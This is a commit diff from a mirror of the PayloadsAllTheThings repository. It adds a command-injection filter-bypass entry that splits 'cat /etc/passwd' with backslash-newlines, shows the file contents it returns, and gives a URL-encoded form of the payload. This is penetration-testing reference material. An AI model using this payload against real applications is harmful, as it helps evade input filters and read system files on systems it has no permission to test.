mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
command injection with backslash newline
This commit is contained in:
parent
c17ae602fc
commit
c1d1c9fcbc
@ -12,6 +12,7 @@
|
|||||||
* [Filter Bypasses](#filter-bypasses)
|
* [Filter Bypasses](#filter-bypasses)
|
||||||
* [Bypass without space](#bypass-without-space)
|
* [Bypass without space](#bypass-without-space)
|
||||||
* [Bypass with a line return](#bypass-with-a-line-return)
|
* [Bypass with a line return](#bypass-with-a-line-return)
|
||||||
|
* [Bypass with Backslash Newline](#bypass-with-backslash-newline)
|
||||||
* [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
|
* [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
|
||||||
* [Bypass blacklisted words](#bypass-blacklisted-words)
|
* [Bypass blacklisted words](#bypass-blacklisted-words)
|
||||||
* [Bypass with single quote](#bypass-with-single-quote)
|
* [Bypass with single quote](#bypass-with-single-quote)
|
||||||
@ -136,6 +137,25 @@ You can also write files.
|
|||||||
hello
|
hello
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass with Backslash Newline
|
||||||
|
|
||||||
|
Commands can be broken into parts by using backslash followed by a newline
|
||||||
|
```powershell
|
||||||
|
❯ cat /et\
|
||||||
|
c/pa\
|
||||||
|
sswd
|
||||||
|
root:x:0:0:root:/root:/usr/bin/zsh
|
||||||
|
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||||
|
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||||
|
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||||
|
sync:x:4:65534:sync:/bin:/bin/sync
|
||||||
|
[SNIP]
|
||||||
|
```
|
||||||
|
URL encoded form would look like this:
|
||||||
|
```powershell
|
||||||
|
cat%20/et%5C%0Ac/pa%5C%0Asswd
|
||||||
|
```
|
||||||
|
|
||||||
### Bypass characters filter via hex encoding
|
### Bypass characters filter via hex encoding
|
||||||
|
|
||||||
Linux
|
Linux
|
||||||
|
Loading…
Reference in New Issue
Block a user